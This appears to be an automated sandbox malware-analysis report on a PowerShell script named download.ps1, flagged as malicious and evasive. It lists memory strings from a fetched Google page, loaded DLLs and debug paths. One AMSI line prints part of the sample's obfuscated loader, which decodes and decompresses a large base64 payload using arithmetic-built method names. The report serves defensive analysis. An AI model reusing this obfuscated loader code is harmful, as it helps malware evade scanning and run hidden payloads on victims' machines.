Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7F7EE60_2_00007FFD9B7F7EE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7F8C920_2_00007FFD9B7F8C92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7EEFD30_2_00007FFD9B7EEFD3
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4AE44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1844355458.000001FE5961F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4AC4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE5973E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE596B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1844355458.000001FE59441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3qyXsaRs6IMLSX2uwuSEs0RcQMyn_Ds" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwiPjuns8d6KAxWjQfEDHa3aLdgQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="yaNCczj9r_UV-cif63DLTA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="yaNCczj9r_UV-cif63DLTA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0a
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4ACA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="yaNCczj9r_UV-cif63DLTA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="yaNCczj9r_UV-cif63DLTA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1727138891.000001FE4B374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkfdkrg4.uer.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $7edjaqr905cnyhb.(([system.String]::new(@((24857/371),(-8911+(2840+(6018+(-8231+(11897-3502))))),(-9023+9135),(-5924+(36699195/(4502+1569))),(1836-(9275-7523)),(-2126+(4160-(-4911+6834)))))))( $4157m6iesh3l8nu ) $7edjaqr905cnyhb.(([char[]]@((2050-1983),(1029780/9535),(415917/3747),(8588-8473),(4736-(13338-(65742462/(12446-(44541660/(12215-(26332370/(41361295/(87+4798)))))))))) -join ''))()$i1jzloy6bdp4n9g.(([system.String]::new(@((8197-(28105410/3457)),(2358-2250),(1137084/(69782128/(10117-(7310-4005)))),(133055/(10695308/(26742892/2893))),(910818/(65344428/7246))))))()[byte[]] $jv31ztaxlfu80mo = $4157m6iesh3l8nu.(([char[]]@((-7975+8059),(3155-(960+(1118+966))),(281320/(4162+166)),(-6032+6146),(-7773+7887),(-3892+(-58+(6865-2818))),(-4586+4707)) -join ''))() $6nfw8ys0lvebhat=$jv31ztaxlfu80mo return $6nfw8ys0lvebhat}[System.Text.Encoding]::ascii.((-join (@((227342/3202),(587416/5816),(116232/1002),(253814/3058),(97324/839),(1371-1257),(571830/5446),(1732-(-3810+(30794008/5669))),(12257/119))| ForEach-Object { [char]$_ })))((p7v3f419gblk0iomyrjz6tuw5d8 "buI5ZmM2emF8c8/5KuZlMRXx5eK8BEo8Fc8bAW1RpU4+W/ND6FVUIOkpiAHZ26NgRV3s3gpa9oyX7b0anDp8JbBq1rlLM1cw1p/oHc7JH8wND5mzHJLGqPClyeY/VL37zbXOnofanXaPnI66nXaM2FsIQRwMBRjUDhpAia15dT5GTl0cj5H89XSR1a6WHJ0WDljOsaiJ5NwAipgHDpfso7LzkTbDyLlqXhxGnZ6dJT8lnz25jIfTmpvCs+IXzF+4jtXM0Y6AvLOeHmzYPbKrPPtFjBjPqJ8ASr6vvLdqFN2YfhOrzw/PuhFHiVduJD7pECCQUt6JzY+fHspYgzqGChoPgz+qyzoNxCRqiVDho6dmOUpbXbJvxBQPV6CDy9ESN/5zzqjgPf4hOIYq3USIUDXjWH6MOK+rmqQUozWhYjKcJpLJ/eKX8FEds1jdLb+nM/VMsLTQHD7irfnGkhZtWoZinD87x02KzeEcc86zNxqMh4qZim4+vkTYDK9WqM+dI88hPNJ70N83qPwm696cAlXwiRy9RnR7w4qv5SxLjFzOrgy5EB+Qq8pxp6GkIW22J577iFvhw2EzPzEP38cqNGBdGN6MonTPuqKHMFSTqsqGTVp6lwQY+gCcT91DyQ+QUCTqX9kGi8bJdD5MgqphVdQvqTOhPJ9ZtPOqPQGZQI+gq8sIv8TGhHX5GJmIFRwTBxWLn5CpDVY9oAQ+qYtv8X1srfbdnZihjE9KhxGr6Nbb6ckutf+MT4WiXffdZLNi86GKoDRQ9CZj5EUrA+T4iACrAKnCE8374kJv+TACyxJNNq1bV9eEA76ulE1BTMVdpzl6zXB3Lv2LFpPLV9Jd6OplmtprZELn2wsGQ1w4+opNPfHlA7OAMomM7DXMZf/G/tRau92Qw1S9WQ2FTbTVn8Irhowj3BxbzxHFEhjRmJ2NDZWOnDLOkogxg93hhF0Lx7KpDED2YcitiAy7H3JIxTbx1o4ITdiDqPIjXFx4wwaW5rU/2YezpmsYU0qu67lMXlR48fjoPA3Ijj8agJLXsVgJxtwAiYSsXua+kFwJ4Y+LjlxRB0umtrt6zE7snYgnQ/gSoskd95KtkqavkJ1nE8pN4eafiMGChl+OuRdVDL5njqAjs48hb/0cCkFeyhuqHjMIL71LiSSQsryOfPjR6GOxHcLuZcm4V87X5JH5LVdee2UnpYLtFE2qTB6rGPvs3aqHGqKsZX7lz5id07DdhjpzkGPO1T0PWjp4I9IMF9axYrXkJbM4BjotIbexQf8E21DAVAif9Mz1gpjvibas8dzKzh6DkZyz8ZdOOH/JmYDLjsHuvI8LpuzSbsW39pkARFD2xP/+6x0X1mS6Ywjdr2PUAWRboxgLsHngwyv0fOIAk8Ri1DbhOGCnePMs+IBurUnnpywxhNLTXQQKqvfw34nMwNiyeb12mI2MSfVxqmoRt0veKymvCKslICvCb7v58N+oJob94I71U7HMBBtDiNrCj8vpuJjgkY3+43D5pHqAVCIKkOGy5wE//iGIdfnMxU97TP95Hq4/BeS5fRo6zYH1e0tsUjaLW3vv20jIgobPvr2rv5bSjrLlA7yFLFUjfWbfmozQDcLxaNrQYBALEmP1L5prKrrDIQKEfUJ8w5J8us+e13SaCsE1G6V1zx9n2vNA8SgFlvh02Cm3pBV91nSxUF1gS7RmWKLk5lCI3+wzZXT3cVKQ+xssDEW/xwulEIOoxVMm56iTTRdytuLb54vQ9+cWNZ5pVabB9JWP3idM4MJVEWB6Z/m6iqGK6pE2FZgSNDNO1OlTLUL6EQsB2Gw8NMNaxeitaBbDw5lHTOUf2oDQu8ZxWR/0ezf9Srb6F0vaO5P7Pjt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1725656350.000001FE473E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1858436667.000001FE614CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbI source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1725656350.000001FE473E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Automation.pdba source: powershell.exe, 00000000.00000002.1858436667.000001FE614CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE6181E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb^h source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1858436667.000001FE614CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE618F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE618A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE6181E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1861814628.000001FE6178B000.00000004.00000020.00020000.00000000.sdmp
